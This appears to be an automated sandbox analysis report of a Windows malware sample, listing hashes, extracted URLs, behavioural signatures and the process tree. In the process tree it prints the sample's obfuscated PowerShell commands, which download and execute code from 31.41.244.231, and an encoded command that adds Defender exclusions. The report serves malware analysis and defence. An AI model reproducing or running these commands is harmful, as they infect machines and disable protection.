Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
12/09/2022, 19:56
General
-
Target
3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe
-
Size
979KB
-
MD5
c13f1a8cf97ee2f8c3c782e7e8bb717f
-
SHA1
02c0218bca2ce9801860b1b0793d8631d09b9933
-
SHA256
3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea
-
SHA512
79073289d8e9b902cbbb895164b7c1e06f18a8367d339b3f3d681170306882de436bcdb9eb3b73c69d4869e40f98138ad8b0d89e1709d2158dfef028b92b4f08
-
SSDEEP
24576:gYrxUgRM5Ybc9bKvu6DPiCskNxZsTB3O6vJV9XKEYoSNd64X:g1Cgb+DPitklsTB3vJLXY5Nd6q
Malware Config
Extracted
http://31.41.244.231/AVAVA/WAW/APPDATA/go.oo
Extracted
http://31.41.244.231/AVAVA/WAW/Documents/go.oo
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Executes dropped EXE 1 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe"C:\Users\Admin\AppData\Local\Temp\3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\Offs\KillDuplicate.cmd" "C:\Users\Admin\AppData\Roaming\Offs" "3060665914753be2ea1a6573c1e071336150744d8e26bb452eae4f5030d549ea.exe""2⤵
-
-
C:\Users\Admin\AppData\Roaming\Offs\Offer.exe"C:\Users\Admin\AppData\Roaming\Offs\Offer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAJwAgACAALQBGAG8AcgBjAGUAOwA=3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/APPDATA/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{BINGO}(N{BINGO}{BINGO}e{BINGO}w-{BINGO}Ob{BINGO}{BINGO}je{BINGO}{BINGO}c{BINGO}t N{BINGO}{BINGO}e{BINGO}t.W{BINGO}e';$c4='b{BINGO}{BINGO}Cli{BINGO}{BINGO}en{BINGO}{BINGO}t{BINGO}).Do{BINGO}{BINGO}wn{BINGO}{BINGO}l{BINGO}o';$c3='a{BINGO}dS{BINGO}{BINGO}t{BINGO}ri{BINGO}{BINGO}n{BINGO}g{BINGO}(''h{BINGO}tt{BINGO}p:/{BINGO}/31.41.244.231/AVAVA/WAW/Documents/go.oo''){BINGO}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{BINGO}',''); IEX $TC |IEX3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5720933ad62030370ffe961f92fa92c02
SHA184e3c1b5d5ca48d22f66092b57e14ab2d8b7efe8
SHA25668d16a03277399c2edeebd2227ceb50b12fa33311a2e5348f28320706c219f0d
SHA51224c1b859293e62d3b1b4e542e2d263b24f1da0832e9d52e3d2455c166c4400c8a6d5acf900e27aaa5dade43446f075012e82fd75d4e8ef7b073291907e38dff5
-
Filesize
7KB
MD5fa4300da126da4a4ecf2c0d82dbe92f4
SHA13acbae61f796e7fad05ee9a875a9d3cbd6ec3996
SHA2561ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5
SHA512d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9
-
Filesize
7KB
MD5fa4300da126da4a4ecf2c0d82dbe92f4
SHA13acbae61f796e7fad05ee9a875a9d3cbd6ec3996
SHA2561ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5
SHA512d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9
-
Filesize
7KB
MD5fa4300da126da4a4ecf2c0d82dbe92f4
SHA13acbae61f796e7fad05ee9a875a9d3cbd6ec3996
SHA2561ddbf6cb9e4c92e93118d8f2ca98922195cf683926777b2c160f5d05d52f3fd5
SHA512d6922c07a9fc04d7c24ffdafd77651996224581b41f2d063a25d5fe1b786a89cf04b88447924f6fe11e9766b08ac97b1f50144a29c1d89d8198b68262c1ae6c9
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
28KB
-
Filesize
28KB
-
Filesize
208KB
-
Filesize
8KB
-
Filesize
28KB
-
Filesize
28KB